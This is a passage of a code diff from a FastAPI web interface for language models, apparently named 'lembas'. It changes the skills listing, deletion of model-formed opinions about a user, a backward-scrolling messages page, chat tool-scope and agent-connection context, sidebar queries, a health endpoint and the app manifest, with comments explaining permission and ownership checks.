|
||||
rows = skills_service.search(
|
||||
db, user, q, limit=PAGE_SIZE, vector=await retrieval.embed_query(db, q)
|
||||
)
|
||||
rows = skills_service.search(db, user, q, limit=PAGE_SIZE)
|
||||
pager = {"page": 1, "pages": 1, "total": len(rows)}
|
||||
else:
|
||||
query = (
|
||||
select(Skill).where(sharing.only_shared(Skill, user))
|
||||
if shared
|
||||
else skills_service.visible(db, user)
|
||||
)
|
||||
rows, pager = _page(db, query.order_by(Skill.name), page)
|
||||
rows, pager = _page(db, skills_service.visible(db, user).order_by(Skill.name), page)
|
||||
return render(
|
||||
request,
|
||||
"library/skills.html",
|
||||
@@ -480,7 +433,6 @@ async def skills_list(
|
||||
"section": "skills",
|
||||
"skills": rows,
|
||||
"q": q,
|
||||
"shared": shared,
|
||||
"pager": pager,
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
@@ -508,7 +460,7 @@ async def skill_detail(request: Request, db: Db, user: RequiredUser, skill_id: s
|
||||
"section": "skills",
|
||||
"skill": skill,
|
||||
"revisions": skill.revisions,
|
||||
**_shared_context(db, user, skill, "skill"),
|
||||
**_shared_context(db, user, skill),
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
)
|
||||
@@ -549,6 +501,7 @@ async def update_skill(request: Request, db: Db, user: RequiredUser, skill_id: s
|
||||
author=AUTHOR_USER,
|
||||
note="edited by hand",
|
||||
)
|
||||
_apply_shares(db, user, skill, form)
|
||||
return RedirectResponse(f"/library/skills/{skill.id}", status_code=status.HTTP_303_SEE_OTHER)
|
||||
|
||||
|
||||
@@ -619,24 +572,3 @@ async def delete_memory(db: Db, user: RequiredUser, memory_id: str) -> Response:
|
||||
return RedirectResponse(
|
||||
"/settings?saved=Memory+removed.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
# What a model has made of the person reading this. Beside the memories rather
|
||||
# than under /api/preferences/, because it is the same screen and the same rule:
|
||||
# it is theirs, it is about them, and it is deletable. A memory is something they
|
||||
# said; this is an opinion a model formed about them, which is a stronger reason
|
||||
# to be able to remove it, not a weaker one.
|
||||
@router.post("/api/library/reflections/{persona_id}/delete")
|
||||
async def delete_reflection(db: Db, user: RequiredUser, persona_id: str) -> Response:
|
||||
from lembas.services import personas as personas_service
|
||||
|
||||
row = db.get(Persona, persona_id)
|
||||
# Checked on the owner, not merely on existence. `owner_id IS NULL` is a
|
||||
# model's own persona, which belongs to the instance and is an administrator's
|
||||
# to edit -- an id from that half must not be deletable from here.
|
||||
if row is None or row.owner_id != user.id:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "There is nothing here to delete.")
|
||||
personas_service.clear(db, row)
|
||||
return RedirectResponse(
|
||||
"/settings?saved=Removed.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
@@ -1,116 +0,0 @@
|
||||
"""Messages: one conversation per person, read backwards on demand.
|
||||
|
||||
The page is the ordinary chat shell with two differences: it opens on the most
|
||||
recent turns rather than on all of them, and above them sits a sentinel that
|
||||
fetches the page before whenever it is scrolled into view.
|
||||
|
||||
That sentinel is the mirror of `GET /api/chats/{id}/tail`, which polls forwards,
|
||||
and it keeps the same four properties for the same reasons — most of all
|
||||
answering **204 to a cursor it cannot place** rather than falling back to "the
|
||||
oldest hundred", which would prepend a block the page already holds.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from fastapi import APIRouter, Request, Response, status
|
||||
|
||||
from lembas.api.deps import Db, RequiredUser
|
||||
from lembas.api.pages import _chat_context, sidebar_context
|
||||
from lembas.db.models import Message, Schedule
|
||||
from lembas.services import messages as messages_service
|
||||
from lembas.services import schedules as schedules_service
|
||||
from lembas.services.schedule import clock
|
||||
from lembas.services.schedule import rule as rule_service
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(tags=["messages"])
|
||||
|
||||
|
||||
@router.get("/messages")
|
||||
async def messages_page(request: Request, db: Db, user: RequiredUser):
|
||||
conversation = messages_service.for_user(db, user)
|
||||
live = messages_service.live_messages(db, conversation)
|
||||
|
||||
# The schedules that post in here, listed beside the conversation because
|
||||
# this is where somebody would look for them -- a schedule whose output
|
||||
# arrives in this thread and whose controls are two pages away is one nobody
|
||||
# will find when they want to stop it.
|
||||
posting = list(
|
||||
db.scalars(
|
||||
schedules_service.visible(user)
|
||||
.where(Schedule.target == "messages")
|
||||
.order_by(Schedule.created_at.desc())
|
||||
)
|
||||
)
|
||||
zone = clock.zone_for(user)
|
||||
|
||||
return render(
|
||||
request,
|
||||
"messages/index.html",
|
||||
{
|
||||
"chat": conversation,
|
||||
"messages": live,
|
||||
"compacted": [],
|
||||
"inherited_prompt": "",
|
||||
"inherited_from": "",
|
||||
"more_before": bool(live) and messages_service.has_more_before(
|
||||
db, conversation, live[0]
|
||||
),
|
||||
"oldest_id": live[0].id if live else "",
|
||||
"schedules": [
|
||||
{
|
||||
"row": row,
|
||||
"summary": rule_service.describe(row.rule_json or {}, zone=zone),
|
||||
}
|
||||
for row in posting
|
||||
],
|
||||
**_chat_context(db, user, conversation),
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/api/messages/history")
|
||||
async def messages_history(
|
||||
request: Request, db: Db, user: RequiredUser, before: str = ""
|
||||
) -> Response:
|
||||
"""The page of turns immediately before `before`, oldest first.
|
||||
|
||||
204 rather than a fallback whenever the cursor cannot be placed: an absent
|
||||
one, one from another chat, one belonging to a message that has gone. The
|
||||
alternative -- answering with the oldest page -- would prepend a block the
|
||||
reader is already looking at, and a duplicated transcript is something only
|
||||
a reload can reconcile.
|
||||
"""
|
||||
conversation = messages_service.for_user(db, user)
|
||||
cursor = db.get(Message, before) if before else None
|
||||
if cursor is None or cursor.chat_id != conversation.id:
|
||||
return Response(status_code=status.HTTP_204_NO_CONTENT)
|
||||
|
||||
page = messages_service.older_than(db, conversation, cursor)
|
||||
if not page:
|
||||
return Response(status_code=status.HTTP_204_NO_CONTENT)
|
||||
|
||||
from lembas.web.templating import templates
|
||||
|
||||
return templates.TemplateResponse(
|
||||
request,
|
||||
"messages/_history.html",
|
||||
{
|
||||
"messages": page,
|
||||
"more_before": messages_service.has_more_before(db, conversation, page[0]),
|
||||
"oldest_id": page[0].id,
|
||||
# `render()` injects `user` and friends; `TemplateResponse` does
|
||||
# not, and `chat/_message.html` dereferences both `user` and `chat`
|
||||
# -- the same reason the SSE path passes them by hand. Missing
|
||||
# either is a 500 on scroll and nothing at all on the page that
|
||||
# rendered fine.
|
||||
"user": user,
|
||||
"chat": conversation,
|
||||
**_chat_context(db, user, conversation),
|
||||
},
|
||||
)
|
||||
+36
-548
@@ -2,37 +2,21 @@
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from zoneinfo import available_timezones
|
||||
|
||||
from fastapi import APIRouter, HTTPException, Request, Response, status
|
||||
from fastapi.responses import FileResponse, JSONResponse, RedirectResponse
|
||||
from sqlalchemy import select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.api.deps import Db, RequiredUser
|
||||
from lembas.config import settings
|
||||
from lembas.db.models import (
|
||||
KIND_CHAT,
|
||||
KIND_MESSAGES,
|
||||
KIND_TASK,
|
||||
KINDS,
|
||||
Chat,
|
||||
Folder,
|
||||
KnowledgeBase,
|
||||
Message,
|
||||
User,
|
||||
)
|
||||
from lembas.db.models import Chat, Folder, KnowledgeBase, Message, User
|
||||
from lembas.security import permissions
|
||||
from lembas.services import audio as audio_service
|
||||
from lembas.services import branding as branding_service
|
||||
from lembas.services import canvas as canvas_service
|
||||
from lembas.services import chat as chat_service
|
||||
from lembas.services import compaction as compaction_service
|
||||
from lembas.services import reports as reports_service
|
||||
from lembas.services import settings_store
|
||||
from lembas.services import suggestions as suggestions_service
|
||||
from lembas.services.library import documents as documents_service
|
||||
from lembas.services.schedule import clock
|
||||
from lembas.services.markdown import render_markdown
|
||||
from lembas.web.templating import STATIC_DIR, render
|
||||
|
||||
router = APIRouter(tags=["pages"])
|
||||
@@ -43,17 +27,6 @@ router = APIRouter(tags=["pages"])
|
||||
THEME_COLOUR = {"moria": "#101317", "shire": "#F6F1E4"}
|
||||
|
||||
|
||||
def _instance_colour(brand) -> str:
|
||||
"""The background this instance paints before anything has loaded.
|
||||
|
||||
A custom theme sets `bg` itself; otherwise the built-in it inherits from
|
||||
decides, which is what `data-base` means everywhere else. Falls back to
|
||||
Moria rather than raising -- a splash screen is not worth a 500.
|
||||
"""
|
||||
theme = brand.theme(settings.default_theme)
|
||||
return theme.tokens.get("bg") or THEME_COLOUR.get(theme.base, THEME_COLOUR["moria"])
|
||||
|
||||
|
||||
def _chat_context(db: DBSession, user: User, chat: Chat | None) -> dict:
|
||||
"""Model lists and permissions every chat page needs.
|
||||
|
||||
@@ -64,6 +37,9 @@ def _chat_context(db: DBSession, user: User, chat: Chat | None) -> dict:
|
||||
current = next((m for m in models if m.model_id == chat.model_id), None) if chat else None
|
||||
return {
|
||||
"models": models,
|
||||
# For the sidebar shortcuts only. The picker lists `models` in the
|
||||
# administrator's order, pinned or not.
|
||||
"pinned_models": [m for m in models if m.pinned],
|
||||
"current_model": current,
|
||||
# Assistant bubbles show the avatar of the model that wrote them, which
|
||||
# may not be the model the chat is set to now. Keyed by model_id, the
|
||||
@@ -82,146 +58,15 @@ def _chat_context(db: DBSession, user: User, chat: Chat | None) -> dict:
|
||||
else []
|
||||
),
|
||||
"attached_base_ids": [base.id for base in chat.knowledge_bases] if chat else [],
|
||||
# What *this* model takes, not the three every model used to be assumed
|
||||
# to take. The vocabulary is per model -- gpt-oss has no `xhigh` and
|
||||
# Bonsai has no `high`, and sending the wrong one does not degrade, it
|
||||
# raises inside the chat template and fails the reply. From the service
|
||||
# so the command, the control and the request builder cannot disagree.
|
||||
"efforts": chat_service.efforts_for(current) if current else chat_service.DEFAULT_EFFORTS,
|
||||
# What the picker shows, and what `build_request` will send. One
|
||||
# resolver so the two cannot disagree.
|
||||
"resolved_effort": chat_service.resolved_effort(chat) if chat else "",
|
||||
**_scope_context(db, user, chat),
|
||||
# The three a reasoning model understands. From the service so the
|
||||
# command, the control and the request builder cannot disagree about
|
||||
# what is a valid effort.
|
||||
"efforts": chat_service.EFFORTS,
|
||||
**_agent_context(db, user, chat),
|
||||
**audio_service.template_flags(db, user),
|
||||
}
|
||||
|
||||
|
||||
def _scope_context(db: DBSession, user: User, chat: Chat | None) -> dict:
|
||||
"""What this chat may use, for the menu that narrows it.
|
||||
|
||||
The families listed are the ones actually offered *right now*, so the menu
|
||||
never shows a switch for something the model, the reader's permissions or
|
||||
the instance has already ruled out -- turning that on would do nothing,
|
||||
since `resolve_tools` applies this after the gates.
|
||||
|
||||
**It works before the chat exists**, and that is not a nicety. The whole
|
||||
point of narrowing is to decide what a conversation may reach, and the first
|
||||
turn is the one where it matters most: the harness puts a tool's guidance in
|
||||
front of the model the moment the tool is offered, so by the time a chat
|
||||
existed to switch anything off, the model had already been told how to keep
|
||||
notes and been given the tools to do it. Switching it off afterwards does
|
||||
not un-send that turn.
|
||||
|
||||
It used to say there was no row to write to. There is not -- so the
|
||||
prospective menu writes nothing: its switches are plain checkboxes submitted
|
||||
with the first message, and `start_chat` turns them into `scope_json` on the
|
||||
row it is about to create. `scope_allow` stays empty because nothing can
|
||||
have been allowed yet.
|
||||
|
||||
The stand-in `Chat` is `agent/draft.py:as_chat`'s trick again: `resolve_tools`
|
||||
reads the kind, the model and the scope off a chat and never queries or
|
||||
writes it, so a row that is constructed and never added satisfies it
|
||||
unchanged. `scope_json` is set explicitly because it is a *column* default,
|
||||
applied at flush, and this one is never flushed.
|
||||
"""
|
||||
from lembas.services import tool_labels
|
||||
from lembas.services import tools as tools_service
|
||||
from lembas.services.library import skills as skills_service
|
||||
|
||||
prospective = chat is None
|
||||
if prospective:
|
||||
model_id = ""
|
||||
chosen = chat_service.default_model(db, user)
|
||||
if chosen is not None:
|
||||
model_id = chosen[0]
|
||||
if not model_id:
|
||||
return {"scope_families": [], "scope_skills": [], "scope_allow": []}
|
||||
# An ordinary chat, deliberately, even though the kind can still be
|
||||
# switched on this screen: an agent chat's tools depend on a connection
|
||||
# that is not settled until the chat is created, so offering them here
|
||||
# would be a switch for something that may not be offered. Everything a
|
||||
# plain chat can reach is switchable, which is the part that matters.
|
||||
chat = Chat(user_id=user.id, kind=KIND_CHAT, model_id=model_id, scope_json={})
|
||||
|
||||
off = tools_service.scoped_off(chat)
|
||||
skills_off = tools_service.scoped_skills_off(chat)
|
||||
|
||||
# Gates rather than tool names: `notes` is one switch, not five, which is
|
||||
# the same reasoning the per-model capability checkboxes carry.
|
||||
seen: dict[str, str] = {}
|
||||
for tool in tools_service.resolve_tools(db, chat, user).defs:
|
||||
seen.setdefault(tools_service.gate_of(tool.family), tool.name)
|
||||
# Anything already switched off is absent from the offered set, so it has to
|
||||
# be put back or there would be no way to turn it on again.
|
||||
for gate in off:
|
||||
seen.setdefault(gate, "")
|
||||
|
||||
families = [
|
||||
{
|
||||
"gate": gate,
|
||||
"label": _GATE_LABELS.get(gate) or tool_labels.label_for(example) or gate,
|
||||
"on": gate not in off,
|
||||
}
|
||||
for gate, example in sorted(seen.items())
|
||||
]
|
||||
|
||||
skills = []
|
||||
if permissions.has(db, user, "library.use"):
|
||||
skills = [
|
||||
{
|
||||
"name": skill.name,
|
||||
"description": skill.description,
|
||||
"on": skill.name not in skills_off,
|
||||
}
|
||||
for skill in skills_service.enabled_for(db, user)
|
||||
]
|
||||
for name in sorted(skills_off):
|
||||
if name not in {s["name"] for s in skills}:
|
||||
skills.append({"name": name, "description": "", "on": False})
|
||||
|
||||
# What this chat has been told to stop asking about. Shown so the list
|
||||
# cannot grow invisibly: every entry is one click of "Always allow this" on
|
||||
# a card, and a standing permission nobody can see is one nobody can revoke.
|
||||
return {
|
||||
"scope_families": families,
|
||||
"scope_skills": skills,
|
||||
"scope_allow": list(tools_service.scoped_allow(chat)),
|
||||
# Which of the two menus to draw: switches that POST at once, or
|
||||
# switches that ride along with the first message. The template asks
|
||||
# this rather than `chat is None`, so the reason is named where the
|
||||
# difference is.
|
||||
"scope_prospective": prospective,
|
||||
}
|
||||
|
||||
|
||||
# What a gate is called in the menu. A gate covers several tools, so no single
|
||||
# tool's label is the right name for it.
|
||||
_GATE_LABELS = {
|
||||
"web_search": "Web search",
|
||||
"fetch": "Fetching pages",
|
||||
"knowledge": "Your knowledge library",
|
||||
"notes": "Notes",
|
||||
"memory": "Memory",
|
||||
"skills": "Skills",
|
||||
"ask": "Asking you questions",
|
||||
"scratch": "Writing in the canvas",
|
||||
"image": "Generating images",
|
||||
"report": "Filing reports",
|
||||
"schedule": "Scheduling work",
|
||||
"subagent": "Sending helpers",
|
||||
"friend": "Asking other models",
|
||||
# Not "Personality": this is a switch that stops it *changing* one, and the
|
||||
# text it has already stays in front of it either way. Turning it off for one
|
||||
# conversation is the useful case -- you are working on something and would
|
||||
# rather this hour did not become part of how it sees you.
|
||||
"persona": "Changing its personality",
|
||||
"agent": "Running commands",
|
||||
"custom": "Custom tools",
|
||||
"mcp": "MCP servers",
|
||||
}
|
||||
|
||||
|
||||
def _agent_context(db: DBSession, user: User, chat: Chat | None) -> dict:
|
||||
"""What the composer and the chat header need to know about agent chats.
|
||||
|
||||
@@ -231,44 +76,23 @@ def _agent_context(db: DBSession, user: User, chat: Chat | None) -> dict:
|
||||
would lead anywhere.
|
||||
"""
|
||||
from lembas.db.models import SshProfile
|
||||
from lembas.services.agent import hosts
|
||||
from lembas.services.agent import policy as agent_policy
|
||||
|
||||
profiles: list[SshProfile] = []
|
||||
if settings_store.agents(db).get("enabled") and permissions.has(db, user, "tools.agent"):
|
||||
profiles = [
|
||||
profile
|
||||
for profile in db.scalars(
|
||||
profiles = list(
|
||||
db.scalars(
|
||||
select(SshProfile)
|
||||
.where(SshProfile.owner_id == user.id, SshProfile.enabled.is_(True))
|
||||
.order_by(SshProfile.name)
|
||||
)
|
||||
# A connection pointing at this machine that an administrator has not
|
||||
# allowed is not offered at all. `session.resolve` refuses it too and
|
||||
# is the control; this is so it never appears in a picker whose only
|
||||
# outcome is an agent chat with no tools and nothing said about why.
|
||||
if hosts.usable(db, profile)
|
||||
]
|
||||
)
|
||||
|
||||
current = None
|
||||
if chat is not None and chat.ssh_profile_id:
|
||||
current = db.get(SshProfile, chat.ssh_profile_id)
|
||||
if current is not None and current.owner_id != user.id:
|
||||
current = None
|
||||
elif chat is None and profiles:
|
||||
# The new-chat screen. Which connection is *chosen* is a decision being
|
||||
# made in the browser, so the server cannot know it -- what it can say is
|
||||
# that there is one to choose, which is all the panels need in order to
|
||||
# exist. They are pointed at a target by `lembas:agent-target`, and show
|
||||
# nothing until they are.
|
||||
#
|
||||
# This says the panels may *exist*, never that they should be *offered*.
|
||||
# The two buttons render `hidden` here and are shown by the same event,
|
||||
# because the kind toggle and the connection select are both in the
|
||||
# browser: answering with `profiles[0]` and leaving it at that offered a
|
||||
# terminal on an ordinary chat with nothing selected, and pressing it
|
||||
# opened a panel that could not work.
|
||||
current = profiles[0]
|
||||
|
||||
return {
|
||||
"agent_profiles": profiles,
|
||||
@@ -278,53 +102,9 @@ def _agent_context(db: DBSession, user: User, chat: Chat | None) -> dict:
|
||||
for m in agent_policy.MODES
|
||||
],
|
||||
"terminal_enabled": _terminal_enabled(db, user, chat, current),
|
||||
# Whether this chat could have background jobs at all. Not whether it
|
||||
# has any -- that is what the chip's own request answers, five seconds
|
||||
# later, off the request path. A chip that can never show anything is a
|
||||
# chip that only takes room in a row this codebase has already had to
|
||||
# fight to keep on one line.
|
||||
"jobs_enabled": _jobs_enabled(db, user, chat, current),
|
||||
# Any chat that exists. Deliberately not gated the way the terminal is:
|
||||
# half the canvas's sources -- notes, skills, this chat's attachments,
|
||||
# its own scratch document -- need no machine at all, so the terminal's
|
||||
# total gate would remove a working feature because one source is
|
||||
# unavailable. Absent on the new-chat screen for the reason the scope
|
||||
# menu is: there is no row yet to hang a tab on.
|
||||
# Also before the chat exists, where it opens on the connection being
|
||||
# chosen in the composer. That reverses an earlier decision -- "there is
|
||||
# no row yet to hang a tab on" -- which was true of the *storage* and
|
||||
# was never a reason to withhold the panel: a draft holds its tabs in
|
||||
# memory and hands them over when the chat is created. See
|
||||
# services/agent/draft.py.
|
||||
"canvas_enabled": chat is not None or bool(profiles),
|
||||
# And whether it may *also* reach project files. Re-derived server-side
|
||||
# on every canvas request; this flag only decides what the panel offers.
|
||||
"canvas_agent": canvas_service.agent_ready(db, user, chat) is not None,
|
||||
}
|
||||
|
||||
|
||||
def _jobs_enabled(db: DBSession, user: User, chat: Chat | None, profile) -> bool:
|
||||
"""Whether background jobs are possible in this chat.
|
||||
|
||||
The same shape as `_terminal_enabled` and for the same reason, but keyed on
|
||||
`background_enabled` rather than on `terminal_enabled` and on `tools.agent`
|
||||
rather than `agent.terminal` -- somebody who may have a model run commands
|
||||
here may see which of them are still running. It is not a second permission,
|
||||
because there is no action here the agent tools do not already grant.
|
||||
"""
|
||||
from lembas.db.models import KIND_AGENT
|
||||
from lembas.services.agent import ssh as ssh_service
|
||||
|
||||
if chat is None or chat.kind != KIND_AGENT or profile is None:
|
||||
return False
|
||||
if not permissions.has(db, user, "tools.agent"):
|
||||
return False
|
||||
values = settings_store.agents(db)
|
||||
if not values.get("enabled") or not values.get("background_enabled"):
|
||||
return False
|
||||
return ssh_service.available() == ""
|
||||
|
||||
|
||||
def _terminal_enabled(db: DBSession, user: User, chat: Chat | None, profile) -> bool:
|
||||
"""Whether this chat can offer a shell of its own.
|
||||
|
||||
@@ -336,9 +116,7 @@ def _terminal_enabled(db: DBSession, user: User, chat: Chat | None, profile) ->
|
||||
from lembas.db.models import KIND_AGENT
|
||||
from lembas.services.agent import ssh as ssh_service
|
||||
|
||||
# `chat is None` is the new-chat screen, which may open a shell on the
|
||||
# connection being chosen there. Everything else still has to hold.
|
||||
if profile is None or (chat is not None and chat.kind != KIND_AGENT):
|
||||
if chat is None or chat.kind != KIND_AGENT or profile is None:
|
||||
return False
|
||||
if not permissions.has(db, user, "agent.terminal"):
|
||||
return False
|
||||
@@ -348,18 +126,6 @@ def _terminal_enabled(db: DBSession, user: User, chat: Chat | None, profile) ->
|
||||
return ssh_service.available() == ""
|
||||
|
||||
|
||||
def sidebar_kind(user: User) -> str:
|
||||
"""Which side of the sidebar's switch this user last chose.
|
||||
|
||||
One resolver, because the page, the fragment route and the switch's own
|
||||
pressed state all have to agree about it. Anything unrecognised -- an older
|
||||
release's value, a hand-edited row -- reads as ordinary chats rather than
|
||||
showing an empty sidebar nobody can explain.
|
||||
"""
|
||||
chosen = (user.settings_json or {}).get("sidebar_kind")
|
||||
return chosen if chosen in KINDS else KIND_CHAT
|
||||
|
||||
|
||||
def sidebar_context(db: DBSession, user: User) -> dict:
|
||||
"""Folder tree plus the chats that belong to no folder.
|
||||
|
||||
@@ -368,98 +134,29 @@ def sidebar_context(db: DBSession, user: User) -> dict:
|
||||
|
||||
Only root folders are queried; children come through the relationship and
|
||||
render recursively in the template.
|
||||
|
||||
Everything is narrowed to one `Chat.kind`. A folder the filter has emptied
|
||||
is dropped here rather than in the template, so the "Folders" heading cannot
|
||||
appear above nothing -- the same reason `visible_chats` moved off the
|
||||
template in the first place. `shown_in` is what draws that line: a folder
|
||||
that was empty to begin with is kept, on both sides.
|
||||
"""
|
||||
# With the switch absent the sidebar goes back to showing everything, rather
|
||||
# than to one side of a fork nobody can move. An administrator turning agent
|
||||
# chats off would otherwise strand whoever last left the switch on Agents in
|
||||
# a sidebar that is empty with no way out of it.
|
||||
split = permissions.has(db, user, "agent.ssh") and bool(
|
||||
settings_store.agents(db).get("enabled")
|
||||
)
|
||||
kind = sidebar_kind(user) if split else ""
|
||||
|
||||
folders = [
|
||||
folder
|
||||
for folder in db.scalars(
|
||||
folders = list(
|
||||
db.scalars(
|
||||
select(Folder)
|
||||
.where(Folder.user_id == user.id, Folder.parent_id.is_(None))
|
||||
.order_by(Folder.position, Folder.name)
|
||||
)
|
||||
if folder.shown_in(kind)
|
||||
]
|
||||
narrowed = select(Chat).where(
|
||||
Chat.user_id == user.id,
|
||||
Chat.folder_id.is_(None),
|
||||
Chat.archived.is_(False),
|
||||
Chat.temporary.is_(False),
|
||||
# `kind` empty means "both sides of the switch", never "no filter" --
|
||||
# see `Folder.visible_chats`. Task chats and the Messages conversation
|
||||
# have sections of their own and must never appear in this list, and
|
||||
# the case that reaches here with "" is precisely an instance with
|
||||
# agents disabled, where nobody would ever see the leak coming.
|
||||
Chat.kind.in_((kind,) if kind else KINDS),
|
||||
)
|
||||
unfiled = list(
|
||||
db.scalars(narrowed.order_by(Chat.pinned.desc(), Chat.updated_at.desc()))
|
||||
)
|
||||
# The same query with the one filter inverted, and no `pinned` in the order:
|
||||
# a pinned chat that somebody archived is one they have said two opposite
|
||||
# things about, and the more recent instruction is the one to honour.
|
||||
archived = list(
|
||||
db.scalars(
|
||||
select(Chat)
|
||||
.where(
|
||||
Chat.user_id == user.id,
|
||||
Chat.archived.is_(True),
|
||||
Chat.folder_id.is_(None),
|
||||
Chat.archived.is_(False),
|
||||
Chat.temporary.is_(False),
|
||||
Chat.kind.in_((kind,) if kind else KINDS),
|
||||
)
|
||||
.order_by(Chat.updated_at.desc())
|
||||
.order_by(Chat.pinned.desc(), Chat.updated_at.desc())
|
||||
)
|
||||
)
|
||||
return {
|
||||
"folders": folders,
|
||||
"unfiled_chats": unfiled,
|
||||
# Archived chats are NOT narrowed to unfiled ones: a chat inside a
|
||||
# folder disappears from that folder when it is archived (the folder's
|
||||
# own listing has always filtered them out), so without this it would
|
||||
# have left one list and joined none.
|
||||
"archived_chats": archived,
|
||||
# The shortcuts at the top of the sidebar. Here rather than in
|
||||
# `_chat_context`, where they used to be, for two reasons: they are
|
||||
# sidebar content and the fragment route that re-renders the sidebar has
|
||||
# only this, and the library and connections pages carry the sidebar
|
||||
# without ever calling `_chat_context` -- so the shortcuts simply were
|
||||
# not there on any of them. The picker lists every model in the
|
||||
# administrator's order, pinned or not; pinning is not ordering.
|
||||
"pinned_models": [m for m in chat_service.available_models(db, user) if m.pinned],
|
||||
# Whether the Reports entry starts with its dot showing. Only the first
|
||||
# paint: from then on `/api/chats/unread` moves it out of band, the same
|
||||
# deal a chat row's dot has. Counted rather than existence-checked
|
||||
# because the same query answers both and a count is what a title would
|
||||
# want if this ever grows one.
|
||||
"unread_reports": reports_service.unread_count(db, user),
|
||||
# Read rather than created, for the reason the poll does the same: this
|
||||
# runs on every page, and `messages.for_user` would write a conversation
|
||||
# for every account that has never opened the section.
|
||||
"unread_messages": bool(
|
||||
db.scalar(
|
||||
select(Chat.unread).where(
|
||||
Chat.user_id == user.id, Chat.kind == KIND_MESSAGES
|
||||
)
|
||||
)
|
||||
),
|
||||
"sidebar_kind": kind,
|
||||
# Whether the switch is worth showing at all. A two-way switch with one
|
||||
# useful side is worse than no switch: it offers a view that is empty by
|
||||
# construction and cannot be made otherwise.
|
||||
"sidebar_split": split,
|
||||
"can": permissions.resolve(db, user),
|
||||
}
|
||||
|
||||
@@ -475,32 +172,6 @@ async def home(user: RequiredUser):
|
||||
# has by definition no server to ask who is looking at it.
|
||||
|
||||
|
||||
@router.get("/healthz", include_in_schema=False)
|
||||
async def healthz() -> Response:
|
||||
"""Is the process up and can it reach its database.
|
||||
|
||||
Unauthenticated, like the three below, and for a fourth reason: a
|
||||
healthcheck that needed a session would be a healthcheck nothing could run.
|
||||
It says nothing about *what* is here -- no version, no counts -- because it
|
||||
is reachable without signing in and a health endpoint is a common place to
|
||||
leak the first fact an attacker wants.
|
||||
|
||||
The query is what makes it worth having. A process that is up with a
|
||||
database it cannot open answers every page with a 500, and a check that only
|
||||
proved the socket was listening would call that healthy.
|
||||
"""
|
||||
from sqlalchemy import text
|
||||
|
||||
from lembas.db.session import session_scope
|
||||
|
||||
try:
|
||||
with session_scope() as db:
|
||||
db.execute(text("SELECT 1"))
|
||||
except Exception: # noqa: BLE001 - the answer is the status code
|
||||
return JSONResponse({"status": "error"}, status_code=503)
|
||||
return JSONResponse({"status": "ok"})
|
||||
|
||||
|
||||
@router.get("/manifest.webmanifest", include_in_schema=False)
|
||||
async def manifest(db: Db) -> Response:
|
||||
"""The web app manifest.
|
||||
@@ -510,75 +181,19 @@ async def manifest(db: Db) -> Response:
|
||||
else would be wrong on the one screen that is hardest to correct: the
|
||||
launcher.
|
||||
"""
|
||||
brand = branding_service.for_db(db)
|
||||
icons = brand.icon_paths
|
||||
colour = _instance_colour(brand)
|
||||
name = settings_store.get(db, "instance_name") or "LLeMbas"
|
||||
return JSONResponse(
|
||||
{
|
||||
# Matches `start_url`. An id is only an identity key and need not be
|
||||
# navigable, but "/" named a path that serves nothing but a redirect
|
||||
# while the app started somewhere else, which reads as a mistake to
|
||||
# anyone comparing the two.
|
||||
"id": "/chat",
|
||||
"name": brand.name,
|
||||
"short_name": brand.name[:12],
|
||||
"description": brand.tagline or "A web UI for your language models.",
|
||||
"lang": "en",
|
||||
"dir": "ltr",
|
||||
"id": "/",
|
||||
"name": name,
|
||||
"short_name": name[:12],
|
||||
"description": "A web UI for your language models.",
|
||||
"start_url": "/chat",
|
||||
"scope": "/",
|
||||
"display": "standalone",
|
||||
# Ordered best-first: a browser takes the first it understands and
|
||||
# falls through to `display` if it understands none of them.
|
||||
"display_override": ["standalone", "minimal-ui"],
|
||||
"orientation": "any",
|
||||
"categories": ["productivity", "utilities"],
|
||||
# Opening a link belonging to this scope focuses the window that is
|
||||
# already open rather than making a second one.
|
||||
"launch_handler": {"client_mode": "navigate-existing"},
|
||||
# The launcher's long-press menu. Three destinations rather than
|
||||
# ten: a menu nobody can read at a glance is a menu nobody opens.
|
||||
"shortcuts": [
|
||||
{"name": "New chat", "url": "/chat"},
|
||||
{"name": "Messages", "url": "/messages"},
|
||||
{"name": "Scheduled", "url": "/scheduled"},
|
||||
],
|
||||
# Both follow whatever theme this instance is set up in. They were
|
||||
# Moria's near-black regardless, so a parchment instance installed
|
||||
# to a phone flashed a dark splash screen and then opened light --
|
||||
# and `THEME_COLOUR["shire"]` sat beside them, defined and read by
|
||||
# nothing. The *instance* default and not the reader's own theme:
|
||||
# a manifest is fetched without credentials unless the link asks
|
||||
# otherwise, so there is nobody to ask.
|
||||
"background_color": colour,
|
||||
"theme_color": colour,
|
||||
# Without these, Chrome on Android offers the one-line mini-infobar
|
||||
# rather than the install dialog that carries a name, an icon and a
|
||||
# picture -- which is the difference between an install somebody
|
||||
# chooses and one they swipe away without reading. Captured from the
|
||||
# running application by `scripts/shoot.py --manifest-screenshots`,
|
||||
# because the one thing a screenshot must not be is a drawing of
|
||||
# what the application looks like.
|
||||
"screenshots": [
|
||||
{"src": "/static/img/screenshot-narrow.png", "sizes": "390x844",
|
||||
"type": "image/png", "form_factor": "narrow",
|
||||
"label": "A conversation on a phone"},
|
||||
{"src": "/static/img/screenshot-wide.png", "sizes": "1280x800",
|
||||
"type": "image/png", "form_factor": "wide",
|
||||
"label": "A conversation, with the sidebar beside it"},
|
||||
],
|
||||
# An uploaded logo's derived icons, or the shipped ones. Whole-set
|
||||
# rather than per size: a manifest listing two custom icons and one
|
||||
# shipped is a launcher tile that changes when the device picks a
|
||||
# different size, which reads as a bug in the install.
|
||||
"background_color": THEME_COLOUR["moria"],
|
||||
"theme_color": THEME_COLOUR["moria"],
|
||||
"icons": [
|
||||
{"src": f"/branding/{icons['icon-192']}", "sizes": "192x192",
|
||||
"type": "image/png", "purpose": "any"},
|
||||
{"src": f"/branding/{icons['icon-512']}", "sizes": "512x512",
|
